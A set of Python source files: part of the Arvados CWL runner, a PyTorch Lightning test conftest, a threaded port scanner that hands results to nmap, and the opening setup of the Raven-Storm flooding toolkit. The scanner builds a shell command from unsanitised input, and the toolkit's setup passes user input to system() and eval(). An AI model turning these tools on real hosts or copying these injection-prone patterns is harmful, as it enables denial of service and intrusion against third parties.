logger.warning("Failed to delete intermediate output: %s", sys.exc_info()[1], exc_info=(sys.exc_info()[1] if self.debug else False))
except (KeyboardInterrupt, SystemExit):
break
def check_features(self, obj, parentfield=""):
if isinstance(obj, dict):
if obj.get("class") == "DockerRequirement":
if obj.get("dockerOutputDirectory"):
if not obj.get("dockerOutputDirectory").startswith('/'):
raise SourceLine(obj, "dockerOutputDirectory", validate.ValidationException).makeError(
"Option 'dockerOutputDirectory' must be an absolute path.")
if obj.get("class") == "InplaceUpdateRequirement":
if obj["inplaceUpdate"] and parentfield == "requirements":
raise SourceLine(obj, "class", UnsupportedRequirement).makeError("InplaceUpdateRequirement not supported for keep collections.")
for k,v in viewitems(obj):
self.check_features(v, parentfield=k)
elif isinstance(obj, list):
for i,v in enumerate(obj):
with SourceLine(obj, i, UnsupportedRequirement, logger.isEnabledFor(logging.DEBUG)):
self.check_features(v, parentfield=parentfield)
def make_output_collection(self, name, storage_classes, tagsString, output_properties, outputObj):
outputObj = copy.deepcopy(outputObj)
files = []
def capture(fileobj):
files.append(fileobj)
adjustDirObjs(outputObj, capture)
adjustFileObjs(outputObj, capture)
generatemapper = NoFollowPathMapper(files, "", "", separateDirs=False)
final = arvados.collection.Collection(api_client=self.api,
keep_client=self.keep_client,
num_retries=self.num_retries)
for k,v in generatemapper.items():
if v.type == "Directory" and v.resolved.startswith("_:"):
continue
if v.type == "CreateFile" and (k.startswith("_:") or v.resolved.startswith("_:")):
with final.open(v.target, "wb") as f:
f.write(v.resolved.encode("utf-8"))
continue
if not v.resolved.startswith("keep:"):
raise Exception("Output source is not in keep or a literal")
sp = v.resolved.split("/")
srccollection = sp[0][5:]
try:
reader = self.collection_cache.get(srccollection)
srcpath = urllib.parse.unquote("/".join(sp[1:]) if len(sp) > 1 else ".")
final.copy(srcpath, v.target, source_collection=reader, overwrite=False)
except arvados.errors.ArgumentError as e:
logger.error("Creating CollectionReader for '%s' '%s': %s", k, v, e)
raise
except IOError as e:
logger.error("While preparing output collection: %s", e)
raise
def rewrite(fileobj):
fileobj["location"] = generatemapper.mapper(fileobj["location"]).target
for k in ("listing", "contents", "nameext", "nameroot", "dirname"):
if k in fileobj:
del fileobj[k]
adjustDirObjs(outputObj, rewrite)
adjustFileObjs(outputObj, rewrite)
with final.open("cwl.output.json", "w") as f:
res = str(json.dumps(outputObj, sort_keys=True, indent=4, separators=(',',': '), ensure_ascii=False))
f.write(res)
final.save_new(name=name, owner_uuid=self.project_uuid, storage_classes=storage_classes,
ensure_unique_name=True, properties=output_properties)
logger.info("Final output collection %s \"%s\" (%s)", final.portable_data_hash(),
final.api_response()["name"],
final.manifest_locator())
final_uuid = final.manifest_locator()
tags = tagsString.split(',')
for tag in tags:
self.api.links().create(body={
"head_uuid": final_uuid, "link_class": "tag", "name": tag
}).execute(num_retries=self.num_retries)
def finalcollection(fileobj):
fileobj["location"] = "keep:%s/%s" % (final.portable_data_hash(), fileobj["location"])
adjustDirObjs(outputObj, finalcollection)
adjustFileObjs(outputObj, finalcollection)
return (outputObj, final)
def set_crunch_output(self):
if self.work_api == "containers":
current = arvados_cwl.util.get_current_container(self.api, self.num_retries, logger)
if current is None:
return
try:
self.api.containers().update(uuid=current['uuid'],
body={
'output': self.final_output_collection.portable_data_hash(),
'output_properties': self.final_output_collection.get_properties(),
}).execute(num_retries=self.num_retries)
self.api.collections().update(uuid=self.final_output_collection.manifest_locator(),
body={
'is_trashed': True
}).execute(num_retries=self.num_retries)
except Exception:
logger.exception("Setting container output")
raise
def apply_reqs(self, job_order_object, tool):
if "https://w3id.org/cwl/cwl#requirements" in job_order_object:
if tool.metadata.get("http://commonwl.org/cwltool#original_cwlVersion") == 'v1.0':
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1 or greater and re-run with "
"--enable-dev.")
job_reqs = job_order_object["https://w3id.org/cwl/cwl#requirements"]
for req in job_reqs:
tool.requirements.append(req)
def arv_executor(self, updated_tool, job_order, runtimeContext, logger=None):
self.debug = runtimeContext.debug
workbench1 = self.api.config()["Services"]["Workbench1"]["ExternalURL"]
workbench2 = self.api.config()["Services"]["Workbench2"]["ExternalURL"]
controller = self.api.config()["Services"]["Controller"]["ExternalURL"]
logger.info("Using cluster %s (%s)", self.api.config()["ClusterID"], workbench2 or workbench1 or controller)
updated_tool.visit(self.check_features)
self.pipeline = None
self.fs_access = runtimeContext.make_fs_access(runtimeContext.basedir)
self.secret_store = runtimeContext.secret_store
self.trash_intermediate = runtimeContext.trash_intermediate
if self.trash_intermediate and self.work_api != "containers":
raise Exception("--trash-intermediate is only supported with --api=containers.")
self.intermediate_output_ttl = runtimeContext.intermediate_output_ttl
if self.intermediate_output_ttl and self.work_api != "containers":
raise Exception("--intermediate-output-ttl is only supported with --api=containers.")
if self.intermediate_output_ttl < 0:
raise Exception("Invalid value %d for --intermediate-output-ttl, cannot be less than zero" % self.intermediate_output_ttl)
if runtimeContext.submit_request_uuid and self.work_api != "containers":
raise Exception("--submit-request-uuid requires containers API, but using '{}' api".format(self.work_api))
runtimeContext = runtimeContext.copy()
default_storage_classes = ",".join([k for k,v in self.api.config().get("StorageClasses", {"default": {"Default": True}}).items() if v.get("Default") is True])
if runtimeContext.storage_classes == "default":
runtimeContext.storage_classes = default_storage_classes
if runtimeContext.intermediate_storage_classes == "default":
runtimeContext.intermediate_storage_classes = default_storage_classes
if not runtimeContext.name:
runtimeContext.name = self.name = updated_tool.tool.get("label") or updated_tool.metadata.get("label") or os.path.basename(updated_tool.tool["id"])
if runtimeContext.copy_deps is None and (runtimeContext.create_workflow or runtimeContext.update_workflow):
# When creating or updating workflow record, by default
# always copy dependencies and ensure Docker images are up
# to date.
runtimeContext.copy_deps = True
runtimeContext.match_local_docker = True
if runtimeContext.update_workflow and self.project_uuid is None:
# If we are updating a workflow, make sure anything that
# gets uploaded goes into the same parent project, unless
# an alternate --project-uuid was provided.
existing_wf = self.api.workflows().get(uuid=runtimeContext.update_workflow).execute()
runtimeContext.project_uuid = existing_wf["owner_uuid"]
self.project_uuid = runtimeContext.project_uuid
# Upload local file references in the job order.
job_order = upload_job_order(self, "%s input" % runtimeContext.name,
updated_tool, job_order, runtimeContext)
# the last clause means: if it is a command line tool, and we
# are going to wait for the result, and always_submit_runner
# is false, then we don't submit a runner process.
submitting = (runtimeContext.update_workflow or
runtimeContext.create_workflow or
(runtimeContext.submit and not
(updated_tool.tool["class"] == "CommandLineTool" and
runtimeContext.wait and
not runtimeContext.always_submit_runner)))
loadingContext = self.loadingContext.copy()
loadingContext.do_validate = False
if submitting:
loadingContext.do_update = False
# Document may have been auto-updated. Reload the original
# document with updating disabled because we want to
# submit the document with its original CWL version, not
# the auto-updated one.
tool = load_tool(updated_tool.tool["id"], loadingContext)
else:
tool = updated_tool
# Upload direct dependencies of workflow steps, get back mapping of files to keep references.
# Also uploads docker images.
merged_map = upload_workflow_deps(self, tool, runtimeContext)
# Recreate process object (ArvadosWorkflow or
# ArvadosCommandTool) because tool document may have been
# updated by upload_workflow_deps in ways that modify
# inheritance of hints or requirements.
loadingContext.loader = tool.doc_loader
loadingContext.avsc_names = tool.doc_schema
loadingContext.metadata = tool.metadata
tool = load_tool(tool.tool, loadingContext)
if runtimeContext.update_workflow or runtimeContext.create_workflow:
# Create a pipeline template or workflow record and exit.
if self.work_api == "containers":
uuid = upload_workflow(self, tool, job_order,
runtimeContext.project_uuid,
runtimeContext,
uuid=runtimeContext.update_workflow,
submit_runner_ram=runtimeContext.submit_runner_ram,
name=runtimeContext.name,
merged_map=merged_map,
submit_runner_image=runtimeContext.submit_runner_image)
self.stdout.write(uuid + "\n")
return (None, "success")
self.apply_reqs(job_order, tool)
self.ignore_docker_for_reuse = runtimeContext.ignore_docker_for_reuse
self.eval_timeout = runtimeContext.eval_timeout
runtimeContext.use_container = True
runtimeContext.tmpdir_prefix = "tmp"
runtimeContext.work_api = self.work_api
if not self.output_name:
self.output_name = "Output from workflow %s" % runtimeContext.name
if self.work_api == "containers":
if self.ignore_docker_for_reuse:
raise Exception("--ignore-docker-for-reuse not supported with containers API.")
runtimeContext.outdir = "/var/spool/cwl"
runtimeContext.docker_outdir = "/var/spool/cwl"
runtimeContext.tmpdir = "/tmp"
runtimeContext.docker_tmpdir = "/tmp"
if runtimeContext.priority < 1 or runtimeContext.priority > 1000:
raise Exception("--priority must be in the range 1..1000.")
if self.should_estimate_cache_size:
visited = set()
estimated_size = [0]
def estimate_collection_cache(obj):
if obj.get("location", "").startswith("keep:"):
m = pdh_size.match(obj["location"][5:])
if m and m.group(1) not in visited:
visited.add(m.group(1))
estimated_size[0] += int(m.group(2))
visit_class(job_order, ("File", "Directory"), estimate_collection_cache)
runtimeContext.collection_cache_size = max(((estimated_size[0]*192) // (1024*1024))+1, 256)
self.collection_cache.set_cap(runtimeContext.collection_cache_size*1024*1024)
logger.info("Using collection cache size %s MiB", runtimeContext.collection_cache_size)
runnerjob = None
if runtimeContext.submit:
# Submit a runner job to run the workflow for us.
if self.work_api == "containers":
if submitting:
tool = RunnerContainer(self, updated_tool,
tool, loadingContext, runtimeContext.enable_reuse,
self.output_name,
self.output_tags,
submit_runner_ram=runtimeContext.submit_runner_ram,
name=runtimeContext.name,
on_error=runtimeContext.on_error,
submit_runner_image=runtimeContext.submit_runner_image,
intermediate_output_ttl=runtimeContext.intermediate_output_ttl,
merged_map=merged_map,
priority=runtimeContext.priority,
secret_store=self.secret_store,
collection_cache_size=runtimeContext.collection_cache_size,
collection_cache_is_default=self.should_estimate_cache_size)
else:
runtimeContext.runnerjob = tool.tool["id"]
if runtimeContext.cwl_runner_job is not None:
self.uuid = runtimeContext.cwl_runner_job.get('uuid')
jobiter = tool.job(job_order,
self.output_callback,
runtimeContext)
if runtimeContext.submit and not runtimeContext.wait:
runnerjob = next(jobiter)
runnerjob.run(runtimeContext)
self.stdout.write(runnerjob.uuid+"\n")
return (None, "success")
current_container = arvados_cwl.util.get_current_container(self.api, self.num_retries, logger)
if current_container:
logger.info("Running inside container %s", current_container.get("uuid"))
self.poll_api = arvados.api('v1', timeout=runtimeContext.http_timeout)
self.polling_thread = threading.Thread(target=self.poll_states)
self.polling_thread.start()
self.task_queue = TaskQueue(self.workflow_eval_lock, self.thread_count)
try:
self.workflow_eval_lock.acquire()
# Holds the lock while this code runs and releases it when
# it is safe to do so in self.workflow_eval_lock.wait(),
# at which point on_message can update job state and
# process output callbacks.
loopperf = Perf(metrics, "jobiter")
loopperf.__enter__()
for runnable in jobiter:
loopperf.__exit__()
if self.stop_polling.is_set():
break
if self.task_queue.error is not None:
raise self.task_queue.error
if runnable:
with Perf(metrics, "run"):
self.start_run(runnable, runtimeContext)
else:
if (self.task_queue.in_flight + len(self.processes)) > 0:
self.workflow_eval_lock.wait(3)
else:
logger.error("Workflow is deadlocked, no runnable processes and not waiting on any pending processes.")
break
if self.stop_polling.is_set():
break
loopperf.__enter__()
loopperf.__exit__()
while (self.task_queue.in_flight + len(self.processes)) > 0:
if self.task_queue.error is not None:
raise self.task_queue.error
self.workflow_eval_lock.wait(3)
except UnsupportedRequirement:
raise
except:
if sys.exc_info()[0] is KeyboardInterrupt or sys.exc_info()[0] is SystemExit:
logger.error("Interrupted, workflow will be cancelled")
elif isinstance(sys.exc_info()[1], WorkflowException):
logger.error("Workflow execution failed:\n%s", sys.exc_info()[1], exc_info=(sys.exc_info()[1] if self.debug else False))
else:
logger.exception("Workflow execution failed")
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Failed"}).execute(num_retries=self.num_retries)
if self.work_api == "containers" and not current_container:
# Not running in a crunch container, so cancel any outstanding processes.
for p in self.processes:
try:
self.api.container_requests().update(uuid=p,
body={"priority": "0"}
).execute(num_retries=self.num_retries)
except Exception:
pass
finally:
self.workflow_eval_lock.release()
self.task_queue.drain()
self.stop_polling.set()
self.polling_thread.join()
self.task_queue.join()
if self.final_status == "UnsupportedRequirement":
raise UnsupportedRequirement("Check log for details.")
if self.final_output is None:
raise WorkflowException("Workflow did not return a result.")
if runtimeContext.submit and isinstance(tool, Runner):
logger.info("Final output collection %s", tool.final_output)
if workbench2 or workbench1:
logger.info("Output at %scollections/%s", workbench2 or workbench1, tool.final_output)
else:
if self.output_tags is None:
self.output_tags = ""
storage_classes = ""
storage_class_req, _ = tool.get_requirement("http://arvados.org/cwl#OutputStorageClass")
if storage_class_req and storage_class_req.get("finalStorageClass"):
storage_classes = aslist(storage_class_req["finalStorageClass"])
else:
storage_classes = runtimeContext.storage_classes.strip().split(",")
output_properties = {}
output_properties_req, _ = tool.get_requirement("http://arvados.org/cwl#OutputCollectionProperties")
if output_properties_req:
builder = make_builder(job_order, tool.hints, tool.requirements, runtimeContext, tool.metadata)
for pr in output_properties_req["outputProperties"]:
output_properties[pr["propertyName"]] = builder.do_eval(pr["propertyValue"])
self.final_output, self.final_output_collection = self.make_output_collection(self.output_name, storage_classes,
self.output_tags, output_properties,
self.final_output)
self.set_crunch_output()
if runtimeContext.compute_checksum:
adjustDirObjs(self.final_output, partial(get_listing, self.fs_access))
adjustFileObjs(self.final_output, partial(compute_checksums, self.fs_access))
if self.trash_intermediate and self.final_status == "success":
self.trash_intermediate_output()
return (self.final_output, self.final_status)
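# Illustrative sketch (not part of the ArvRunner API): the collection cache
# sizing rule applied in arv_executor() above scales the estimated manifest
# bytes referenced by the job order by a factor of 192, converts to MiB, and
# enforces a 256 MiB floor.  Restated here as a standalone helper for clarity.
def _sketch_collection_cache_mib(total_manifest_bytes):
    """Return the collection cache size in MiB for a given manifest byte count."""
    return max(((total_manifest_bytes * 192) // (1024 * 1024)) + 1, 256)
# Example: 10 MiB of referenced manifests -> max(1921, 256) = 1921 MiB of cache.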
|
conftest.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler
from pathlib import Path
import pytest
import torch.distributed
import torch.multiprocessing as mp
from pytorch_lightning.plugins.environments.lightning_environment import find_free_network_port
from tests import _PATH_DATASETS
@pytest.fixture(scope="session")
def datadir():
return Path(_PATH_DATASETS)
@pytest.fixture(scope="function", autouse=True)
def preserve_global_rank_variable():
"""Ensures that the rank_zero_only.rank global variable gets reset in each test."""
from pytorch_lightning.utilities.distributed import rank_zero_only
rank = getattr(rank_zero_only, "rank", None)
yield
if rank is not None:
setattr(rank_zero_only, "rank", rank)
@pytest.fixture(scope="function", autouse=True)
def restore_env_variables():
"""Ensures that environment variables set during the test do not leak out."""
env_backup = os.environ.copy()
yield
leaked_vars = os.environ.keys() - env_backup.keys()
# restore environment as it was before running the test
os.environ.clear()
os.environ.update(env_backup)
# these are currently known leakers - ideally these would not be allowed
allowlist = {
"CUDA_DEVICE_ORDER",
"LOCAL_RANK",
"NODE_RANK",
"WORLD_SIZE",
"MASTER_ADDR",
"MASTER_PORT",
"PL_GLOBAL_SEED",
"PL_SEED_WORKERS",
"WANDB_MODE",
"HOROVOD_FUSION_THRESHOLD",
"RANK", # set by DeepSpeed
"POPLAR_ENGINE_OPTIONS", # set by IPUPlugin
# set by XLA
"XRT_MESH_SERVICE_ADDRESS",
"XRT_TORCH_DIST_ROOT",
}
leaked_vars.difference_update(allowlist)
assert not leaked_vars, f"test is leaking environment variable(s): {set(leaked_vars)}"
@pytest.fixture(scope="function", autouse=True)
def teardown_process_group():
"""Ensures that the distributed process group gets closed before the next test runs."""
yield
if torch.distributed.is_available() and torch.distributed.is_initialized():
torch.distributed.destroy_process_group()
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
def _run_spawned_test(proc_idx, testfunction, testargs):
    """Entry point for tests marked with ``spawn``: run the test body in the spawned process."""
    return testfunction(*testargs)
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
    if pyfuncitem.get_closest_marker("spawn"):
        testfunction = pyfuncitem.obj
        funcargs = pyfuncitem.funcargs
        testargs = tuple(funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames)
        # Spawn a child process that actually invokes the wrapped test function.
        mp.spawn(_run_spawned_test, (testfunction, testargs))
        return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(("localhost", 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
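# Illustrative usage sketch (hypothetical test function, shown here only to
# document the fixture): `tmpdir_server` yields the (host, port) address of an
# HTTP server rooted at `tmpdir`, so a test can publish a file locally and
# fetch it back over HTTP.
def _example_fetch_from_tmpdir_server(tmpdir, tmpdir_server):
    import urllib.request
    (tmpdir / "hello.txt").write_text("hi", encoding="utf-8")
    host, port = tmpdir_server
    with urllib.request.urlopen(f"http://{host}:{port}/hello.txt") as response:
        assert response.read() == b"hi"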
@pytest.fixture
def single_process_pg():
"""Initialize the default process group with only the current process for testing purposes.
The process group is destroyed when the with block is exited.
"""
if torch.distributed.is_initialized():
raise RuntimeError("Can't use `single_process_pg` when the default process group is already initialized.")
orig_environ = os.environ.copy()
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = str(find_free_network_port())
os.environ["RANK"] = "0"
os.environ["WORLD_SIZE"] = "1"
torch.distributed.init_process_group("gloo")
try:
yield
finally:
torch.distributed.destroy_process_group()
os.environ.clear()
os.environ.update(orig_environ)
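# Illustrative usage sketch (hypothetical test function): with
# `single_process_pg` active, collective ops run against a one-rank "gloo"
# group, so an all_reduce (default SUM) leaves the tensor unchanged.
def _example_single_process_all_reduce(single_process_pg):
    import torch
    import torch.distributed
    t = torch.tensor([1.0, 2.0])
    torch.distributed.all_reduce(t)
    assert torch.equal(t, torch.tensor([1.0, 2.0]))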
|
portfucker.py
|
import threading
from queue import Queue
import time
import socket
import sys
import signal
import os
import argparse
from termcolor import colored
parser = argparse.ArgumentParser(description="Port Fucker | Coded By https://github.com/rootkral4")
parser.add_argument("-i", "--ip", required=True, help="Ip address of host", type=str)
parser.add_argument("-r", "--range", required=False, default="0,1001", help="Scan range default 0,1000", type=str)
parser.add_argument("-t", "--threads", required=False, default=50, help="Threads default 50", type=int)
args = parser.parse_args()
attackip = getattr(args,'ip')
scanrange = getattr(args,'range')
threads = getattr(args,'threads')
scanrange = scanrange.split(",")
print_lock = threading.Lock()
socket.setdefaulttimeout(5)
global portactive
global portlist
portlist = []
portactive = True
print(colored(" 👑 For Real Kings 👑 ", "green"))
print(colored("-" * 40, "magenta"))
print(colored("Url :" + str(attackip), "green"))
print(colored("Port Scan Range :" + str(scanrange[0]) + "-->" + str(scanrange[1]), "green"))
print(colored("Threads :" + str(threads), "green"))
print(colored("-" * 40, "magenta"))
print(colored("rootkral4 | https://github.com/rootkral4","green"))
def portscan(attackip, port):
    global portactive
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect() returns None, so close the socket itself after recording the open port
        s.connect((attackip, port))
        with print_lock:
            portlist.append(port)
        s.close()
    except socket.error:
        pass
print("[*] Now Scanning {} [*]".format(port), end="\r")
if port == int(scanrange[1]):
portactive = False
ports = ""
for port in portlist:
ports += str(port) + ","
print(colored("[!] Port Scan Done, Ports ;\n{}\n".format(ports[:-1]),"green"))
os.system("nmap {} -p {} {} -sV".format(attackip, ports[:-1], "-Pn"))
os.kill(os.getpid(), signal.SIGTERM)
def threader():
while True:
worker = q.get()
portscan(attackip, worker)
q.task_done()
if portactive == False:
break
q = Queue()
for x in range(threads):
t = threading.Thread(target=threader, daemon=True).start()
for worker in range(int(scanrange[0]),int(scanrange[1]) + 1):
q.put(worker)
q.join()
|
main.py
|
# 2020
# The Raven-Storm Toolkit was programmed and developed by Taguar258.
# The Raven-Storm Toolkit is published under the MIT Licence.
# The Raven-Storm Toolkit is based on the CLIF-Framework.
# The CLIF-Framework is programmed and developed by Taguar258.
# The CLIF-Framework is published under the MIT Licence.
import socket
from os import getcwd, name, path, system
from random import choice
from sys import version
from threading import Thread
from time import sleep, time
import requests
from CLIF_Framework.framework import event, tools # noqa: I900
event = event()
tools = tools()
class Main:
def __init__(selfie, console): # noqa: N805
global self
global var
self = selfie
var = console # noqa: VNE002
self._add_commands()
# Colors
var.C_None = "\x1b[0;39m"
var.C_Bold = "\x1b[1;39m"
var.C_Green = "\x1b[32m"
var.C_Violet = "\x1b[34m"
var.C_Dark_Blue = "\x1b[35m"
var.C_Red = "\x1b[31m"
var.port = [80] # Port 80 protocol == TCP
var.threads = 160
var.ip = [""]
var.socketmethod = "TCP" # / UDP
var.sleep = 0
var.outtxt = True
var.outtxtmute = False
var.message = "hey, it's me rs."
var.messagezw = var.message
var.rtxt = 1
var.stress = False
var.timeforstress = 1
var.autostart = 0
var.autostop = 0
var.autostep = 0
var.autostarttime = 0 # Will be used as a variable for autostop
var.runactive = True
var.get_url = ""
var.l4_debug = False
var.stoped_threads = 0
var.user_agents = ["Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", "Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; pl-pl) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5", "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0", "Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; nb-no) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5", "Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00", "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246", "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", "Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00", "Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00", "Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows NT 6.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5", "Mozilla/5.0 (iPhone; U; ru; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5", "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5", "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30", "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)", "Opera/9.80 (X11; Linux i686; U; it) Presto/2.7.62 Version/11.00", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30", "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)", "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01", "Mozilla/5.0 (iPhone; U; fr; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; ru-ru) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-tw) AppleWebKit/533.17.9 (KHTML, like Gecko) 
Version/5.0.2 Mobile/8G4 Safari/6533.18.5"]
def _add_commands(self):
event.commands(self.exit_console, ["exit", "quit", "e", "q"])
event.command(self.help)
event.commands(self.run_shell, ".")
event.commands(self.debug, "$")
event.commands(self.show_values, ["values", "ls"])
event.help_comment("|\n|-- Main commands:")
event.help("port", "Set the target's port.")
event.help("threads", "Set the number of threads.")
event.help("ip", "Set the target's IP.")
event.help("web", "Target the ip of a domain.")
event.help("method", "Change attack method between UPD, TCP.")
event.help("sleep", "Set the time delay between each packet send.")
event.help("outtxt", "Output each packets send status: enable/disable.")
event.help("mute", "Do not output the connection reply.")
event.help(["values", "ls"], "Show all selected options.")
event.help("run", "Start the attack.")
event.help_comment("|\n|-- Set Send-text:")
event.help("message", "Set the packt's message.")
event.help("repeat", "Repeat the target's message specific times.")
event.help("mb", "Send specified amount of MB packtes to server.")
event.help("get", "Define the GET Header.")
event.help("agent", "Define a user agent instead of a random ones.")
event.help_comment("|\n|-- Stress Testing:")
event.help("stress", "Enable the Stress-testing mode.")
event.help("st wait", "Set the time between each stress level.")
event.help_comment("|\n|-- Multiple:")
event.help("ips", "Set multple ips to target.")
event.help("webs", "Set multple domains to target.")
event.help("ports", "Attack multiple ports.")
event.help_comment("|\n|-- Automation:")
event.help("auto start", "Set the delay before the attack should start.")
event.help("auto step", "Set the delay between the next thread to activate.")
event.help("auto stop", "Set the delay after the attack should stop.")
def banner(self):
system("clear || cls")
print(("""C_B----------------------------------------------------------C_W
THE CREATOR DOES NOT TAKE ANY RESPONSIBILITY FOR DAMAGE CAUSED.
THE USER ALONE IS RESPONSIBLE, BE IT: ABUSING RAVEN-STORM
TO FIT ILLEGAL PURPOSES OR ACCIDENTAL DAMAGE CAUSED BY RAVEN-STORM.
BY USING THIS SOFTWARE, YOU MUST AGREE TO TAKE FULL RESPONSIBILITY
FOR ANY DAMAGE CAUSED BY RAVEN-STORM.
EVERY ATTACK WILL CAUSE TEMPORARY DAMAGE, BUT LONG-TERM DAMAGE IS
DEFINITELY POSSIBLE.
RAVEN-STORM SHOULD NOT SUGGEST PEOPLE TO PERFORM ILLEGAL ACTIVITIES.
C_B----------------------------------------------------------C_W""").replace("C_W", var.C_None).replace("C_B", var.C_Bold))
self.help()
def exit_console(self):
print("Have a nice day.")
quit()
def run_shell(self, command):
print("")
system(tools.arg("Enter shell command: ", ". ", command))
print("")
def debug(self, command):
print("")
eval(tools.arg("Enter debug command: ", "$ ", command))
print("")
@event.command
def clear():
system("clear || cls")
@event.event
def on_ready():
self.banner()
@event.event
def on_command_not_found(command):
print("")
print("The command you entered does not exist.")
print("")
def check_session(self):
if var.session[1][0] and len(var.session[1][1]) >= 1:
if len(var.session[1][1][0]) >= 1:
run_following = [var.session[1][1][0][0], var.session[1][1][0][0]]
var.session[1][1][0] = var.session[1][1][0][1:]
else:
var.session[1][1] = var.session[1][1][1:]
run_following = [var.session[1][1][0][0], var.session[1][1][0][0]]
var.session[1][1][0] = var.session[1][1][0][1:]
var.run_command = run_following
@event.event
def on_input():
self.check_session()
if var.server[0] and not var.server[1]:
while True:
